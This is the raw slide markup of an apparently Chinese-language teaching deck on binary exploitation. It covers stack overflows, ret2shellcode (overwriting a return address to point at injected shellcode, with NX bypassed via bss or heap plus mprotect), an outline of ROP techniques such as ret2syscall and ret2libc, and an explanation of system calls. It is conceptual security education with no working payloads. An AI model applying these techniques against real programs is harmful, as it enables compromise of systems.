                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="1166492"/>
                <a:ext cx="1363200" cy="532702"/>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8" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>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Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="44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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>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 name="Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>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Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3681759"/>
                <a:ext cx="1363200" cy="274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a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3957664"/>
                <a:ext cx="1363200" cy="276712"/>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Text</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4234375"/>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Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>shellcode_addr</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10672628" y="924113"/>
            <a:ext cx="858835" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A27E8BD-EE3F-4447-9D68-66DAEB5233CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10760237" y="4556015"/>
            <a:ext cx="683616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Bss</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6631567" y="1396390"/>
            <a:ext cx="4" cy="3388932"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5715100000"/>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Shape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631570" y="4241794"/>
            <a:ext cx="3883021" cy="880906"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">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1" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631567" y="4645297"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode we input</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FC4DA90-B1DB-4350-B58E-A948D3187F02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215442" y="1995953"/>
            <a:ext cx="3610748" cy="313932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篡改栈帧上的返回地址为攻击者手动传入的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>所在缓冲区地址</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初期往往将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>直接写入栈缓冲区</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目前由于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>the NX bits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>保护措施的开启，栈缓冲区不可执行，故当下的常用手段变为向 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bss</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缓冲区写入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或向堆缓冲区写入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>并使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mprotect</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赋予其可执行权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D428442-E10F-4CA8-8CF0-A41520AFB679}"/>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栈溢出基础</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> | ret2shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5603796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3FB6555C-3E05-4F34-871D-1DA28E079374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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D62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="9089091" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>返回导向编程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC43481F-3B3B-4D80-AE04-A8383F14E9A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491840" y="2766155"/>
            <a:ext cx="7730836" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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ret2syscall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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动态链接过程 </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3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ret2libc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">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其它的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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35135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9441375-0C44-49B3-ADBA-65BA3243996D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1621003" y="1923871"/>
            <a:ext cx="8281434" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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操作系统提供给用户的编程接口</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是提供访问操作系统所管理的底层硬件的接口</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本质上是一些内核函数代码，以规范的方式驱动硬件</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x86 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>int 0x80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>指令进行系统调用、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>amd64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>syscall</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指令进行系统调用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773BB1B4-2241-44A2-A2A8-44BCA1128992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088700" y="1144517"/>
            <a:ext cx="2670924" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>系统调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
